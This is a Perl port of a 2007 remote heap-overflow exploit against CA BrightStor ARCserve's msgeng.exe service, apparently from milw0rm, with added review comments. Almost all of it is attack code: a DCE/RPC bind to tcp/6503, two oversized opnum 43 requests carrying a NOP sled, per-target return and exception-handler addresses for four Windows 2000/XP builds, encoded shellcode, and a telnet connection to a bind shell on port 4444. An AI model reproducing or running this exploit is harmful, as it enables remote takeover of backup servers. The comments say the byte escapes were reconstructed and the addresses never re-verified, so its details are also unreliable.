CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2 — Perl port with four Windows 2000/XP return-address targets:

Date : 2007-01-28 Author : Jacopo Cervini
#!/usr/bin/perl
# 
# Perl port of the original exploit by lssec.com
# 
# acaro [at] jervus.it


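use strict;
use warnings;
use IO::Socket::INET;

# Perl port of the lssec.com exploit for the CA BrightStor ARCserve
# msgeng.exe heap overflow: one DCE/RPC bind to the msgeng interface on
# tcp/6503, then two oversized requests for opnum 43 carrying the payload,
# followed by a telnet to tcp/4444 on the target.
#
# NOTE(review): in the copy this was restored from, every backslash had been
# stripped in transit ("x90" for "\x90", ".*" for "\.*", no "\n" in prints).
# The escapes below are reconstructed from the listing's own byte values; the
# hex values themselves are unchanged.
#
# Changes against the original listing, each of which was a defect there:
#   - `my $host = 10.0.0.2;` was an unquoted v-string ("\x0a\x00\x00\x02"),
#     not an address, so -h is now mandatory instead of a broken default.
#   - `use Switch` (a source filter, no longer in core) is replaced by a hash
#     lookup; an omitted -o now really selects target 1 as the usage text
#     promises, instead of leaving $uef/$ret undefined and sending a
#     truncated payload.
#   - `system("telnet $host 4444")` interpolated -h straight into a shell;
#     the host is now validated and passed to telnet in list form.
#   - send()/recv() results are checked; usage no longer prints and then
#     carries on anyway.

my $port = 6503;

# Per-target addresses, keyed by the number given with -o.  All values are
# copied from the original listing, are specific to the named Windows build,
# and are not re-verified here.
#   uef - presumably the UnhandledExceptionFilter pointer (the listing only
#         calls it "uef"); overwritten so the handler lands in the buffer
#   ret - a CALL DWORD PTR [reg+off] gadget, per the listing's own comments
my %target_for = (
    1 => {
        name => 'Windows 2k SP4 English',
        uef  => "\x4c\x14\x54\x7c",
        ret  => "\xbf\x75\x40\x2d",    # CALL DWORD PTR DS:[ESI+48] in qclient.dll
    },
    2 => {
        name => 'Windows 2k SP4 Italian',
        uef  => "\x4c\x14\x68\x79",
        ret  => "\xbf\x75\x40\x2d",    # CALL DWORD PTR DS:[ESI+48] in qclient.dll
    },
    3 => {
        name => 'Windows XP Pro SP1 English',
        uef  => "\xb4\x73\xed\x77",
        ret  => "\x52\xbf\x04\x78",    # CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
    },
    4 => {
        name => 'Windows XP Pro SP0 English',
        uef  => "\xb4\x63\xed\x77",
        ret  => "\xd7\xe9\xd0\x77",    # CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
    },
);

my $usage = <<'END_USAGE';
--------------------------------------------------------------------
Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress
 Return address:
 1 - Windows 2k Sp4 English Version
 2 - Windows 2k Sp4 Italian Version
 3 - Windows XP Pro Sp1 English Version
 4 - Windows XP Pro Sp0 English Version
 If values not specified, Windows 2k Sp4 will be used.
 Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1
--------------------------------------------------------------------
END_USAGE

# Argument parsing: -h<host> (required), -o<N> (target number, default 1).
my $host;
my $target_id = 1;
for my $arg (@ARGV) {
    if ($arg =~ /\A-h(.+)\z/) {
        $host = $1;
    }
    elsif ($arg =~ /\A-o(\d+)\z/) {
        $target_id = $1;
    }
    else {
        print STDERR "Unknown argument '$arg'\n", $usage;
        exit 1;
    }
}

if (!defined $host) {
    print STDERR $usage;
    exit 1;
}
if (!exists $target_for{$target_id}) {
    print STDERR "Unknown target '$target_id'\n", $usage;
    exit 1;
}

# $host is handed to telnet later; allow only hostname/IP characters and no
# leading '-' so it can be neither a shell fragment nor a telnet option.
die "Invalid host '$host'\n" if $host !~ /\A[A-Za-z0-9][A-Za-z0-9.\-]*\z/;

my $target = $target_for{$target_id};

# Encoded payload, copied verbatim from the original listing.  Given the
# telnet step at the end it presumably opens a bind shell on tcp/4444; it is
# not decoded or verified here.
my $shellcode =
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0" .
    "\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" .
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf" .
    "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" .
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf" .
    "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" .
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" .
    "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" .
    "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa" .
    "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28" .
    "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79" .
    "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb" .
    "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42" .
    "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63" .
    "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d" .
    "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a" .
    "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07" .
    "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5" .
    "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b" .
    "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa" .
    "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75" .
    "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";

# DCE/RPC bind (packet type 0x0b) to the msgeng interface.  Field names
# follow the original listing's comments; the fields it left unlabelled are
# named per the standard DCE/RPC bind layout.  The fragment length 0x48 = 72
# matches the 72 bytes assembled here.
my $bind =
    "\x05" .                                   # rpc version
    "\x00" .                                   # rpc version minor
    "\x0b" .                                   # packet type: bind
    "\x03" .                                   # packet flags (first + last fragment)
    "\x10\x00\x00\x00" .                       # data representation
    "\x48\x00" .                               # fragment length
    "\x00\x00" .                               # auth length
    "\x01\x00\x00\x00" .                       # call id
    "\xd0\x16\xd0\x16" .                       # max xmit frag, max recv frag
    "\x00\x00\x00\x00" .                       # assoc group
    "\x01\x00\x00\x00\x00\x00\x01\x00" .       # 1 context item; ctx id 0; 1 transfer syntax
    "\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38" .  # interface uuid
    "\x01\x00" .                               # interface version
    "\x00\x00" .                               # interface version minor
    "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" .  # transfer syntax
    "\x02\x00\x00\x00";                        # transfer syntax version

# DCE/RPC request header (packet type 0x00) for opnum 43.  The fragment
# length / alloc hint 0x0818 (2072) is the original's value and does not
# equal the 2067 and 2090 bytes actually sent below; kept as in the original.
my $request_hdr =
    "\x05" .                   # rpc version
    "\x00" .                   # rpc version minor
    "\x00" .                   # packet type: request
    "\x03" .                   # packet flags
    "\x10\x00\x00\x00" .       # data representation
    "\x18\x08" .               # fragment length
    "\x00\x00" .               # auth length
    "\x01\x00\x00\x00" .       # call id
    "\x00\x08\x00\x00" .       # alloc hint
    "\x00\x00" .               # context id
    "\x2b\x00";                # opnum 43

my $nop = "\x90";
# JMP SHORT +10: skips the two trailing nops, ret and uef (2+4+4 bytes) so
# execution falls into the shellcode that follows them.
my $jmp  = "\xeb\x0a\x90\x90";
my $body = ($nop x 680) . $jmp . $target->{ret} . $target->{uef} . $shellcode;

my $socket = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
) or die "Cannot connect to $host:$port: $@\n";

send_all($socket, $bind);
print "[+] Sent uuid request\n";

# The original discarded the reply.  The expected answer to a bind is a
# bind_ack (packet type 0x0c, third byte); anything else means the interface
# was not bound and the requests below will not reach opnum 43.
my $reply;
defined $socket->recv($reply, 1024)
    or die "recv failed: $!\n";
die "Connection closed before bind reply\n" if !length $reply;
my $ptype = length($reply) >= 3 ? ord(substr($reply, 2, 1)) : -1;
warn "[-] Bind reply is not a bind_ack (packet type $ptype); continuing anyway\n"
    if $ptype != 0x0c;

# The original sends the overflow twice with slightly different trailing
# padding (1006 vs 1029 nops); kept as-is.
for my $req ([ '1st', 1006 ], [ '2nd', 1029 ]) {
    my ($label, $padding) = @{$req};
    send_all($socket, $request_hdr . $body . ($nop x $padding) . "\n");
    print "[+] Sent malicious $label request (target $target_id: $target->{name})\n";
}

print " + Connect on 4444 port of $host ...\n";
sleep 3;
# List-form system(): $host is an argv element, never parsed by a shell.
system('telnet', $host, '4444') == 0
    or warn "telnet exited with status " . ($? >> 8) . "\n";
exit;

# Write $data to $sock, dying on error or on a short write.  send() on a
# blocking TCP socket normally writes the whole buffer, but check the count.
sub send_all {
    my ($sock, $data) = @_;
    my $sent = $sock->send($data);
    die "send failed: $!\n" if !defined $sent;
    die "short send: $sent of " . length($data) . " bytes\n"
        if $sent != length $data;
    return;
}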

# milw0rm.com [2007-01-28]
